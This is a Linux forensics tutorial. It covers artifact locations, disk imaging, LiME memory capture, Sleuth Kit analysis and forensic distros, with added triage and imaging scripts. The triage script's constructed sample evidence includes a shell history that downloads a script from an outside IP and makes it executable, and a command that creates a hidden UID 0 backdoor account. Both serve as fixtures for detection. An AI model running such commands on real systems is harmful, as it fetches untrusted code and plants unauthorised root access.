Linux Forensics


1. Introduction

  • What is Linux?

    • UNIX-like, open-source operating system kernel created by Linus Torvalds; together with the GNU userland and other tooling it forms the systems commonly called Linux.
    • Distributed under the GNU General Public License (GPL): free, publicly available source code.
    • Popular choice for enthusiasts and developers: fast, secure alternative to proprietary OS.
  • History

    • 1991: Linus Torvalds, a student in Helsinki, creates the Linux kernel.
    • Uploaded to the Internet; global community contributions spark the modern Linux ecosystem.
  • Importance in IT

    • Powers all of the TOP500 supercomputers (since 2017), most web and cloud servers, and, through Android, most smartphones, so Linux hosts turn up in a large share of incident-response work.

2. Popular Linux Distributions

Linux “distros” bundle the kernel with tools/configuration. Common examples:

  • Red Hat Enterprise Linux (RHEL): Commercial, subscription-supported distro used by corporations and banks. Powers many Fortune 500 operations.
  • Ubuntu: Developed by Canonical; user-friendly for desktops, servers, cloud, and mobile devices.
  • Fedora: Community-driven; sponsored by Red Hat. On the leading edge of free/open-source tech, and the upstream for RHEL.
  • Debian: One of the earliest distros (1993). Its main archive contains only free software (non-free repositories are optional); ~51,000 packages.
  • SUSE: German-origin enterprise distro. Its early-1994 release makes it one of the oldest.
  • Mint: Based on Debian/Ubuntu; elegant GUI, comfortable user experience.
  • Arch Linux: Independent, rolling-release, minimalist environment.
  • Linux Lite: Debian/Ubuntu base with Xfce; Windows-like UI and preinstalled apps (Dropbox, VLC, LibreOffice).

3. File System

  • Default: EXT4 (successor to EXT2/3)

    • Journaling, metadata checksums → improved reliability.
    • Extents: contiguous block grouping for efficient allocation.
    • Inode metadata: a file's inode persists until its last hard link is removed (link count reaches zero); the directory entry and the inode are separate structures.

4. Forensic Process for Linux Systems

  1. Imaging & Preservation

    • Identify devices and partitions (fdisk -l, lsblk -f); acquire bit-for-bit images through a write blocker or with the source attached read-only, and record hashes of both source and image.
  2. Volatile Evidence

    • Capture RAM first (LiME or a live-response toolkit); memory changes with every command run on the host, so it is acquired before anything else.
  3. Live Forensics

    • Collect what is lost on shutdown: logged-in users, processes, network connections, mounted filesystems. Paths, log formats and CLI utilities differ per distribution, so identify the distro before running collection scripts.
  4. Analysis

    • Same workflow as on Windows (timeline, user activity, persistence, lateral movement) but against Linux-specific artifacts and locations (next sections).

5. Forensic Artifacts

Important directories

| Directory | Description |
|---|---|
| /bin | Essential command binaries (a symlink to /usr/bin on usr-merged distros) |
| /boot | Kernel images, initramfs and bootloader files |
| /dev | Device files |
| /etc | System configuration |
| /home | User home directories |
| /lib | Shared libraries; kernel modules under /lib/modules |
| /media | Mount points for removable media |
| /opt | Add-on packages |
| /root | Root user's home directory |
| /sbin | System binaries |
| /tmp | Temporary files (may be tmpfs, lost on reboot) |
| /var/log | Central log repository |

6. Special Artifacts

| Artifact | Location |
|---|---|
| User profile | /home/$USER (root: /root) |
| System & application logs | /var/log (e.g. syslog or messages, auth.log or secure, kern.log, dpkg.log or dnf.log); systemd journal under /var/log/journal, read with journalctl -D |
| OS info | /etc/os-release (also /etc/issue, /etc/*-release) |
| Install log | /root/install.log (older RHEL/CentOS); /var/log/anaconda/ (newer RHEL family); /var/log/installer/ (Debian/Ubuntu) |
| Hostname | /etc/hostname |
| IP & DNS config | /etc/hosts, /etc/resolv.conf, plus the distro's network config (/etc/network/interfaces, /etc/netplan/, /etc/NetworkManager/system-connections/, /etc/sysconfig/network-scripts/) |
| Time zone | /etc/timezone (Debian/Ubuntu); /etc/localtime symlink target on all distros |
| Login history | /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL family); binary /var/log/wtmp, btmp and lastlog (read with last, lastb, lastlog) |
| Users, groups, privilege | /etc/passwd, /etc/shadow, /etc/group, /etc/sudoers, /etc/sudoers.d/ |
| Scheduled tasks | /etc/crontab, /etc/cron.*/, /var/spool/cron/, systemd timers |
| Recently accessed files | ~/.local/share/recently-used.xbel |
| Command history | ~/.bash_history (also ~/.zsh_history, ~/.viminfo, ~/.lesshst, ~/.python_history) |
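The artifact table above turns into a repeatable triage pass once the image is mounted. The script below is an added example (not code from the original page): it reads the standard locations from a root filesystem mounted read-only at a path you pass in, and flags the cases worth a second look, extra UID 0 accounts in /etc/passwd and accounts with a real login shell. The sample tree built by make_sample_root is constructed for demonstration; the user names, hostname and history lines in it are not from the page.

```shell
#!/bin/sh
# Added example, not code from the original page: offline triage of a Linux
# root filesystem mounted read-only at $ROOT (for instance an image mounted
# with mount -o ro,noload). The paths are the standard locations from the
# artifact tables; make_sample_root builds a constructed tree so the
# functions can be exercised without evidence.

# Build a small constructed root tree (sample data, not real evidence).
make_sample_root() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/home/alice" "$root/root" "$root/var/log"
    printf 'PRETTY_NAME="Ubuntu 22.04.3 LTS"\nID=ubuntu\n' > "$root/etc/os-release"
    printf 'web01\n' > "$root/etc/hostname"
    printf 'Europe/Amsterdam\n' > "$root/etc/timezone"
    # A second UID 0 account ("svc") is planted as a classic backdoor indicator.
    cat > "$root/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc:x:0:0::/:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
EOF
    printf 'wget http://203.0.113.5/x.sh\nchmod +x x.sh\n' > "$root/home/alice/.bash_history"
    printf 'useradd -o -u 0 svc\n' > "$root/root/.bash_history"
    echo "$root"
}

# OS name, hostname and time zone as one "os|host|tz" line.
system_identity() {
    local root="$1" os host tz
    os=$(sed -n 's/^PRETTY_NAME="\(.*\)"$/\1/p' "$root/etc/os-release")
    host=$(cat "$root/etc/hostname")
    # Debian-family keeps /etc/timezone; elsewhere read the /etc/localtime link.
    tz=$(cat "$root/etc/timezone" 2>/dev/null || readlink "$root/etc/localtime")
    printf '%s|%s|%s\n' "$os" "$host" "$tz"
}

# Every account with UID 0. Anything beyond "root" needs an explanation.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1/etc/passwd"
}

# Accounts whose shell allows interactive login.
login_capable_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "$1/etc/passwd"
}

# Shell history of root and every home directory, prefixed with the user name.
collect_histories() {
    local root="$1" f
    for f in "$root"/root/.bash_history "$root"/home/*/.bash_history; do
        [ -f "$f" ] || continue
        sed "s|^|$(basename "$(dirname "$f")"): |" "$f"
    done
}

# Demo run on the constructed tree.
R=$(make_sample_root)
system_identity "$R"
printf 'UID 0 accounts: %s\n' "$(uid0_accounts "$R" | tr '\n' ' ')"
printf 'Login-capable: %s\n' "$(login_capable_accounts "$R" | tr '\n' ' ')"
collect_histories "$R"
```

Point the functions at the mount point of a real image instead of the constructed tree; on a RHEL-family host the time-zone fallback through /etc/localtime is what fires, and login history from wtmp is read separately with last -f "$ROOT/var/log/wtmp".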

7. Linux Distributions for Forensic Analysis

7.1 Kali Linux

  • Origin: Formerly BackTrack; Debian‑based.

  • Purpose: Digital forensics & pentesting.

  • Tools:

    • Forensics: Autopsy, Binwalk, Capstone, chntpw, dc3dd, ddrescue, DFF, diStorm3, Dumpzilla, Extundelete, Foremost, Galleta, Guymager, iPhone backup analyzer, p0f, pdf-parser, pdgmail, RegRipper, Volatility, Xplico
    • Password: acccheck, BruteSpray, CeWL, cisco-auditing-tool, findmyhash

7.2 DEFT Linux

  • Purpose: Law-enforcement & government forensics.

  • Tools:

    • Artifact Extraction: Extractmsg, Readpst, Msgconvert, Rifiuti2, Reglookup, pl, Evtxtract
    • Data Recovery: Catfish, Testdisk, Scalpel, Bulk_extractor
    • Imaging: Affcat, Affcopy, Affcrypto, Affsign, Cyclone, Guymager
    • Hashing: Ssdeep, Md5deep, sha256sum, sha512sum
    • Live Forensics: Evolve, Evtxtract, Rekall, Volatility
    • Malware Analysis: Analyzepdf, Balbuzard, Damm, Mastiff, Chkrootkit, Brxor, Clamscan, Yara, Rkhunter, Unxor.py, Cuckoo, Multiscanner
    • Mobile Forensics: ADB, Fastboot, Bitpim, Apktool, ipddump, idevicebackup2, iphonebackupanalyzer2
    • Mount: Bdemount, Dislocker, vmdkmnt
    • Network: ccze, lnav, multitail, CapAnalysis, Driftnet, Ettercap, Nmap, Tshark, Wireshark, Xplico, Kismet, Aircrack-ng
    • Picture Forensics: Exifprobe, Vinetto, Outguess, Mat, Stegdetect
    • Password Recovery: Cmospwd, Cup, Hashcat, John the Ripper, Pdfcrack, xhydra
    • Misc: Maltego, Tinfoleak
    • Timeline: Hfind, blkcalc, blkcat, fls, ifind, jcat, mmcat, mactime, sorter, srch_strings, fiwalk, log2timeline.py, jpeg_extract, psort.py

7.3 Parrot OS

  • Debian-based; GUI-rich distro bundling forensics, privacy/anti-forensics and pentesting tools.

7.4 Santoku Linux

  • Mobile forensics platform (Android/iOS).
  • Imaging: NAND, media cards, RAM; mobile malware analysis.

7.5 Blackbuntu

  • Ubuntu-based; penetration testing & digital forensics.

7.6 Paladin Linux

  • Ubuntu-based; over 100 forensic tools in 33 categories.

7.7 CAINE

  • Computer Aided INvestigative Environment; user‑friendly forensic suite.

8. Challenges in Linux Forensics

  • No central Registry (artifacts scattered).
  • Deleted files: ext3/ext4 zero the inode's block pointers (the extent tree on ext4) on unlink, so recovery means carving (foremost, scalpel) or journal analysis (extundelete, ext4magic) rather than the simple undelete possible on ext2.
  • ext4 on-disk features (extents, flex_bg, metadata checksums, 64-bit mode) may be unsupported by older forensic tools; confirm support before trusting a tool's listing.
  • CLI-only tools: steeper learning curve.
  • Distro-specific customizations require per-case study.

9. Windows vs. Linux: Forensics Perspective

| Windows | Linux |
|---|---|
| Central Registry stores settings and metadata | No Registry; configuration in plain-text files under /etc, per-user dotfiles, and logs |
| Supports FAT/NTFS | Supports the ext family, Btrfs, XFS, and others |
| Mostly GUI-based tools | Mostly CLI-based tools |
| Multiple local administrator accounts | One superuser, root (UID 0); other accounts gain privilege through sudo, so check /etc/sudoers, /etc/sudoers.d/ and for extra UID 0 entries in /etc/passwd |
| Recycle Bin retains deleted files | Desktop trash under ~/.local/share/Trash; rm unlinks immediately and ext4 zeroes the inode's block pointers |
| Hardware write blockers are the norm | Hardware write blockers work as well; the software alternative is mounting read-only with mount -o ro,noload (noload stops ext4 journal replay, which plain ro does not) |
| Event logs in %SystemRoot%\System32\winevt\Logs; Registry hives in %SystemRoot%\System32\Config | Logs under /var/log (text files plus binary wtmp/btmp/lastlog and the systemd journal); configuration under /etc |

10. Case Studies

10.1 Listing Partitions

  1. Help: fdisk -h (or man fdisk)
  2. List drives: sudo fdisk -l (lsblk -f shows the same devices with filesystem types)
  3. Identify devices and partitions:

    • /dev/sda: 20 GB system disk with partitions /dev/sda1, /dev/sda2 and /dev/sda5.
    • /dev/sdb: 5 GB disk → imaging target.
  4. Image creation:

    sudo dd if=/dev/sdb of=image.001 bs=512 conv=noerror,sync status=progress

    conv=noerror,sync zero-pads an unreadable sector in place instead of aborting (noerror alone would drop it and shift every later offset); with bs matching the sector size a read error costs one sector and the image stays exactly the device's size. Hash source and image afterwards (sha256sum /dev/sdb image.001) and keep the hashes with the case notes. dc3dd and dcfldd do the copy and the hashing in one pass.
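The imaging step above is easy to get subtly wrong, so here is the acquisition wrapped in two functions with the verification built in. This is an added example, not code from the original page: it assumes a real case passes the device (/dev/sdb) as the source and runs as root; the demo at the bottom uses a constructed file filled from /dev/urandom as a stand-in device so it runs offline, and deliberately shows the hash mismatch that a large block size produces on a source that is not a multiple of it.

```shell
#!/bin/sh
# Added example, not code from the original page: dd acquisition with
# post-copy hash verification. Assumption: on a real case SRC is the device
# (/dev/sdb) and this runs as root; the demo below uses a constructed file
# filled from /dev/urandom as a stand-in device so it runs offline.

# acquire SRC DEST [BS]: bit-for-bit copy. conv=noerror,sync zero-pads an
# unreadable block in place instead of aborting or shifting later offsets.
# BS defaults to 512 (the sector size): a larger BS zeroes a whole block
# around one bad sector and pads the tail of the image past the source size,
# which makes the hashes disagree.
acquire() {
    local src="$1" dest="$2" bs="${3:-512}"
    dd if="$src" of="$dest" bs="$bs" conv=noerror,sync status=none
    sha256sum "$src" | awk '{ print $1 }' > "$dest.src.sha256"
    sha256sum "$dest" | awk '{ print $1 }' > "$dest.sha256"
}

# verify_image DEST: MATCH when the image hash equals the source hash.
verify_image() {
    if cmp -s "$1.src.sha256" "$1.sha256"; then echo MATCH; else echo MISMATCH; fi
}

# Demo: a 1 MiB stand-in device (constructed) images cleanly with bs=512;
# a 1000-byte file imaged with bs=1M is padded to 1 MiB and no longer matches.
T=$(mktemp -d)
dd if=/dev/urandom of="$T/sdb" bs=512 count=2048 status=none
acquire "$T/sdb" "$T/image.001"
printf 'bs=512: %s (%s bytes)\n' "$(verify_image "$T/image.001")" "$(wc -c < "$T/image.001")"
head -c 1000 /dev/urandom > "$T/odd"
acquire "$T/odd" "$T/odd.001" 1M
printf 'bs=1M:  %s (%s bytes)\n' "$(verify_image "$T/odd.001")" "$(wc -c < "$T/odd.001")"
```

The sidecar .sha256 files are what go into the chain-of-custody record; a later sha256sum -c against them shows the image has not changed since acquisition.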

10.2 Memory Acquisition (LiME)

  1. Clone repo: git clone https://github.com/504ensicsLabs/LiME/
  2. Build (needs the kernel headers for the running kernel): cd LiME/src && make
     The Makefile names the module lime-$(uname -r).ko; it must be built for exactly the kernel it will be loaded into.
  3. Capture RAM, writing to external media rather than the suspect disk:

    sudo insmod ./lime-$(uname -r).ko "path=../Linux_Memory.mem format=raw"

    format=raw concatenates the System RAM ranges with no headers, so physical addresses are lost; format=lime prefixes each range with a header and is what Volatility reads directly, and format=padded keeps addresses by zero-filling the gaps.
  4. Verify: ls -lh ../Linux_Memory.mem, then sha256sum ../Linux_Memory.mem and record the hash; unload with sudo rmmod lime. Loading the module itself changes a little kernel memory, which is why this step runs before any other live action on the host.

10.3 Live Forensics (SysScout)

  1. Clone: git clone https://github.com/joshbrunty/SysScout
  2. Run from the cloned directory (with root privileges for complete output): bash SysScout.sh
  3. Menu options:

    • Option 1: OS info
    • Option 2: Time & timezone
    • Option 3: Hostname & DNS
    • Option 4: IP, routing, MAC
    • Option 5: Logged-in users
    • Option 6: Last logins
    • Option 7: RAM & top processes

  Record the order and time of each option run; every one of them is itself activity on the host that will appear in later analysis.

10.4 Raw Image Analysis (The Sleuth Kit)

Each step below names the standard Sleuth Kit tool for it (the original page showed the runs as screenshots). -o takes the partition's start sector reported by mmls; omit it for an image of a single filesystem.

  1. Partition layout and type: mmls image.001
  2. FS stats: fsstat -o <start-sector> image.001
  3. List inodes: ils -o <start-sector> image.001
  4. List files: fls -o <start-sector> -r image.001
  5. Timestamps of a file: istat -o <start-sector> image.001 <inode>
  6. Deleted entries: fls -o <start-sector> -rd image.001
  7. Deleted timestamps: istat on the deleted inode; for a whole-filesystem timeline, fls -o <start-sector> -rm / image.001 | mactime -b - -d
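Two things from sections 9 and 10.4 are worth having as code: turning the mmls sector table into byte offsets, and mounting a partition of the image without the mount writing to it. The script below is an added example, not code from the original page or from The Sleuth Kit; MMLS_SAMPLE is constructed to look like mmls output for a two-partition DOS table (the sector numbers and the image name image.001 are assumptions), and ro_mount_cmd only prints the mount line since mounting needs root.

```shell
#!/bin/sh
# Added example, not code from the original page: convert mmls output into
# byte offsets and build the read-only loop mount command for a partition.
# MMLS_SAMPLE is constructed to look like mmls output for a DOS partition
# table; on a real case use: mmls image.001 | partition_offsets

MMLS_SAMPLE='DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000002047   0000002048   Unallocated
002:  000:000   0000002048   0000010239   0000008192   Linux (0x83)
003:  000:001   0000010240   0000020479   0000010240   Linux Swap / Solaris x86 (0x82)'

# partition_offsets: read mmls output on stdin and print
# "start_sector byte_offset description" for each allocated partition (rows
# whose slot column looks like NNN:NNN). The sector size comes from the
# "Units are in N-byte sectors" line rather than being assumed.
partition_offsets() {
    awk '
        BEGIN { ss = 512 }
        /^Units are in/ { sub(/-byte.*/, "", $4); ss = $4 + 0; next }
        $2 ~ /^[0-9]+:[0-9]+$/ {
            desc = $6
            for (i = 7; i <= NF; i++) desc = desc " " $i
            printf "%d %d %s\n", $3 + 0, ($3 + 0) * ss, desc
        }'
}

# ro_mount_cmd IMAGE START_SECTOR SECTOR_SIZE MOUNTPOINT: the mount line for
# an ext2/3/4 partition inside a raw image. ro alone still replays the ext4
# journal and writes to the image; noload stops that (XFS needs norecovery
# instead). noexec,nodev keep evidence binaries and device nodes inert.
ro_mount_cmd() {
    printf 'mount -o ro,noload,noexec,nodev,offset=%d %s %s\n' "$(($2 * $3))" "$1" "$4"
}

# Demo on the constructed table: every Linux partition gets a mount line.
printf '%s\n' "$MMLS_SAMPLE" | partition_offsets | while read -r start offset desc; do
    case "$desc" in
        "Linux (0x83)") ro_mount_cmd image.001 "$start" 512 "/mnt/evidence/p$start" ;;
        *) printf '# skip %s at sector %s\n' "$desc" "$start" ;;
    esac
done
```

The same start sector feeds the -o argument of fsstat, fls and istat in 10.4, so one parse of mmls drives both the Sleuth Kit pass and the mount; hash the image again after unmounting to prove the noload mount left it untouched.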

11. Summary

  • Linux: open-source, GPL‑licensed, community‑driven OS.
  • Multiple distros for general and forensic use.
  • EXT4: default FS with journaling and extents.
  • Forensics: imaging, memory capture, live analysis, raw image examination.
  • Key artifacts in /etc, /var/log, /home, CLI histories.
  • Specialized forensic distros: Kali, DEFT, Parrot, Santoku, etc.
  • Challenges: no Registry, metadata wiping, CLI learning curve.
  • Windows vs. Linux: architecture and tool differences.